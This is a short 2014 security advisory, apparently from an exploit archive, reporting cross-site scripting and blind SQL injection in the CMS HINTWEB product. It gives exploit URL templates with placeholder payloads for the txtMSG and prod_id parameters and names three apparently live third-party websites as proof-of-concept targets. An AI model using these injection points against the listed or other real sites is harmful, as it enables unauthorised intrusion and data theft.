CMS HINTWEB Cross Site Scripting and SQL Injection

2014.05.06

Credit: Felipe Andrian Peixoto

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89
CWE-79

[+] Cross Site Scripting on CMS HINTWEB
[+] Date: 04/05/2014
[+] Risk: LOW
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.hintweb.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: index.php
[+] Exploit : http://host//index.php?txtMSG=[XSS]
[+] PoC : http://www.z3som.com.br/site/index.php?txtMSG=Felipe Andrian Peixoto
http://www.casadoscelulares.com/index.php?txtMSG=Felipe Andrian Peixoto
http://lojaspopular.com.br/index.php?txtMSG=Felipe Andrian Peixoto
[+] Admin Page: http://host/adm/
[+] Blind Sql Injection on CMS HINTWEB
[+] Date: 04/05/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.hintweb.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: index.php
[+] Exploit : http://host/index.php?ID=produto&prod_id=[ Blind SQL Injection]
[+] PoC: http://www.z3som.com.br/site/index.php?ID=produto&prod_id=[SQL Injection]
http://www.lojaspopular.com.br/index.php?ID=produto&prod_id=[SQL Injection]
http://casadoscelulares.com/index.php?ID=produto&prod_id=[SQL Injection]
[+] Admin Page: http://host/adm/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CMS HINTWEB Cross Site Scripting and SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.